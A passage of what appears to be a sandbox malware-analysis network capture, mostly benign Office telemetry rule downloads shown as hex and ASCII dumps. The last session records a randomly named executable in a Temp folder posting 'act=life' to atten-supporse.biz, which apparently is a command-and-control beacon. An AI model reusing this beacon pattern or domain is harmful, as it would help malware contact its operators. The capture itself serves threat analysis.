9f 1e e2 73 f7 6e 2d 24 88 09 e2 36 d5 5d 58 47 f9 97 28 a1 82 23 8a ec 8c 1d af Data Ascii: cVhKG0L?,Sq6BV_R\k'~P+]}{}XbB'Lp'<kJ}@F{}9HZM:Uf/?{t>O!V1\|LG.xA=i2uPB*v<qUF4;@`fD.nut[&7cG?FT}sn-$6]XG(#
2024-12-08 18:53:39 UTC	16384	IN	Data Raw: 20 7b 1d 64 91 3a dd ec 6c 9d cd 6f 3c 7b f3 05 64 9f 3a e9 13 ef af 5b 6b fb 73 4a 45 08 ce 8b 26 b5 c8 55 18 87 30 51 d0 e8 bb 80 a3 46 95 90 ab 7e 7c 82 a9 b8 4b 49 05 4c 2f f9 a6 44 f8 05 9f c2 0a fb d7 77 9d 12 a1 89 9a 3d 29 5f a8 1c 2b 9e 19 1f d1 01 c9 32 93 b3 4e 7a 21 1a e7 5c ed 35 cc e1 bf 22 50 da 19 9f 10 15 e5 1d 69 f8 77 06 45 b8 fd 62 26 77 22 1e 4d 96 bf 5f 5f 81 c0 50 3d 36 7b bc 78 ba a3 50 e5 51 15 b6 1a c2 0a fe a7 ac 26 19 b4 60 f6 9d 76 50 6b 70 5c eb 7f 68 73 c9 f3 2c 8b 86 51 2d 02 32 a8 3c 25 bb af cb 69 23 87 11 26 6a 5d ca 3a ae 0d 39 48 4d 8f 14 cb 9c 47 70 dc 7a bb 50 55 27 ce f2 a4 99 56 0f 29 d0 d5 ec e2 f9 88 12 e3 3b 24 69 b8 53 a2 d8 17 f6 dc 9b 2d 1a 25 84 a7 e5 0d 8c 05 02 1f 93 36 69 30 08 5f 7b 68 f9 1e 45 a4 74 7a Data Ascii: {d:lo<{d:[ksJE&U0QF~\|KIL/Dw=)_+2Nz!\5"PiwEb&w"M__P=6{xPQ&`vPkp\hs,Q-2<%i#&j]:9HMGpzPU'V);$iS-%6i0_{hEtz
2024-12-08 18:53:39 UTC	16384	IN	Data Raw: 87 ed a9 a0 74 4b 83 c6 4c dd b7 95 c3 6b 7d ef e3 b5 45 c5 80 b8 d8 ce 6d 35 c2 84 fe b0 18 d0 45 85 d6 1b 42 ca 77 70 6b 28 6f 60 9f e9 90 6d 8a 12 6c 45 7b 29 92 41 a6 d0 ce 6d 06 3e bf 18 14 3e 4c 59 fb c7 1a cc 07 74 48 e1 76 62 5e 94 9a 43 f2 d5 d3 f9 42 4b d9 ab 59 e6 15 fd 39 03 0b 24 39 a1 bd a3 2f 22 ea 73 e9 7e 88 75 6a f2 68 05 6c 46 b8 58 de 2e b2 9a 37 8f 69 f7 f4 85 3e fc 3f 76 2d a4 69 0f d0 14 68 e7 03 4f ec 0f 59 9b 8d 23 b7 b6 41 11 ce 89 7f 68 20 c0 56 c1 42 a8 82 dd d7 dc 6f 30 bf 33 a7 04 5d 92 ac 1d ad a0 c2 7f 22 43 5b e2 4d 75 ba 37 3f ee 50 9a 37 11 c5 b1 41 b4 22 5c 9d bd 50 8c 88 18 49 63 07 0c f5 d1 0d 4a 37 ac eb 81 22 12 5b ad c2 62 20 dc 7c e9 b4 c6 48 b4 12 aa db e7 78 e7 18 e5 ae b2 8c 0b fd 65 81 d6 1f 8a b1 e8 fa 98 df Data Ascii: tKLk}Em5EBwpk(o`mlE{)Am>>LYtHvb^CBKY9$9/"s~ujhlFX.7i>?v-ihOY#Ah VBo03]"C[Mu7?P7A"\PIcJ7"[b \|Hxe

Session ID	Source IP	Source Port	Destination IP	Destination Port
83	192.168.2.4	49851	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:39 UTC	193	OUT	GET /rules/rule120602v10s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:40 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:40 GMT Content-Type: text/xml Content-Length: 2592 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB5B890DB" x-ms-request-id: b9410fe1-901e-0015-5b03-48b284000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185340Z-r1cf579d778xr2r4hC1EWRqvfs000000062g000000008tup x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:40 UTC	2592	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=

Session ID	Source IP	Source Port	Destination IP	Destination Port
84	192.168.2.4	49848	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:39 UTC	192	OUT	GET /rules/rule120679v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:40 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:40 GMT Content-Type: text/xml Content-Length: 174 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT ETag: "0x8DC582B91D80E15" x-ms-request-id: 18148ef3-001e-002b-2504-4899f2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185340Z-r1cf579d778dndrdhC1EWR4b2400000005tg000000005upk x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:40 UTC	174	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>

Session ID	Source IP	Source Port	Destination IP	Destination Port
85	192.168.2.4	49849	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:39 UTC	192	OUT	GET /rules/rule120680v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:40 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:40 GMT Content-Type: text/xml Content-Length: 1952 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B956B0F3D" x-ms-request-id: 42d07f15-f01e-0099-5306-489171000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185340Z-r1cf579d778zvkpnhC1EWRv23g00000006cg0000000078mk x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:40 UTC	1952	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
86	192.168.2.4	49850	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:39 UTC	192	OUT	GET /rules/rule120682v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:40 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:40 GMT Content-Type: text/xml Content-Length: 501 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT ETag: "0x8DC582BACFDAACD" x-ms-request-id: 7e532cc8-301e-000c-2603-48323f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185340Z-r1cf579d778v97q7hC1EWRf95c00000005wg0000000008h4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:40 UTC	501	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="

Session ID	Source IP	Source Port	Destination IP	Destination Port
87	192.168.2.4	49852	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:39 UTC	192	OUT	GET /rules/rule120681v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:40 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:40 GMT Content-Type: text/xml Content-Length: 958 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT ETag: "0x8DC582BA0A31B3B" x-ms-request-id: 0b61f7bb-f01e-0052-4103-489224000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185340Z-r1cf579d778zvkpnhC1EWRv23g00000006f0000000002vvn x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:40 UTC	958	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
88	192.168.2.4	49857	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:41 UTC	193	OUT	GET /rules/rule224901v11s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:42 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:42 GMT Content-Type: text/xml Content-Length: 2284 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT ETag: "0x8DC582BCD58BEEE" x-ms-request-id: ef8e0549-001e-0066-1d03-48561e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185342Z-r1cf579d778x776bhC1EWRdk80000000062g000000007xs9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:42 UTC	2284	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"

Session ID	Source IP	Source Port	Destination IP	Destination Port
89	192.168.2.4	49856	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:41 UTC	192	OUT	GET /rules/rule120601v3s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:42 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:42 GMT Content-Type: text/xml Content-Length: 3342 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT ETag: "0x8DC582B927E47E9" x-ms-request-id: 1dbd6d1b-a01e-0002-3903-485074000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185342Z-r1cf579d778lntp7hC1EWR9gg400000005f000000000buvr x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:42 UTC	3342	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI

Session ID	Source IP	Source Port	Destination IP	Destination Port
90	192.168.2.4	49858	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:41 UTC	192	OUT	GET /rules/rule701201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:42 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:42 GMT Content-Type: text/xml Content-Length: 1393 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT ETag: "0x8DC582BE3E55B6E" x-ms-request-id: 3b26165d-801e-008f-064c-492c5d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185342Z-r1cf579d778xr2r4hC1EWRqvfs00000006900000000016ty x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:42 UTC	1393	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"

Session ID	Source IP	Source Port	Destination IP	Destination Port
91	192.168.2.4	49859	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:41 UTC	191	OUT	GET /rules/rule90401v3s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:42 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:42 GMT Content-Type: text/xml Content-Length: 1250 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT ETag: "0x8DC582BDE4487AA" x-ms-request-id: 5b9ff148-a01e-000d-0606-48d1ea000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185342Z-r1cf579d778x776bhC1EWRdk80000000065g000000004mvz x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:42 UTC	1250	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 39 30 34 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 53 61 6d 70 6c 69 6e 67 50 6f 6c 69 63 79 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 4d 65 74 61 64 61 74 61 22 20 2f 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="90401" V="3" DC="ESM" EN="Office.Telemetry.SamplingPolicy" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" DL="A" DCa="PSP PSU" xmlns=""> <RIS> <RI N="Metadata" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.4	49860	13.107.246.63	443	7860	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:42 UTC	192	OUT	GET /rules/rule701200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:42 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:42 GMT Content-Type: text/xml Content-Length: 1356 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDC681E17" x-ms-request-id: 8a7a9c83-801e-0078-4106-48bac6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185342Z-r1cf579d7788pwqzhC1EWRrpd800000006eg000000003dmc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:42 UTC	1356	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.4	49862	104.21.16.9	443	8128	C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:42 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: atten-supporse.biz
2024-12-08 18:53:42 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-08 18:53:43 UTC	1019	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=47roah6o0q7m7hllsndfv652ij; expires=Thu, 03-Apr-2025 12:40:22 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iAN86dgmUZ3ZQhatFhv3RlRk6wJuwApTeDPob%2FhiGMSF3bWEkzGUOjsHUJalcF%2BDA0cH%2BAL3Ja1nFqquLPO%2FJlybAfghcaMJLXSaYA9hHvAfWMmwrLAppQQi%2FMOvxAlps1xlWbs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 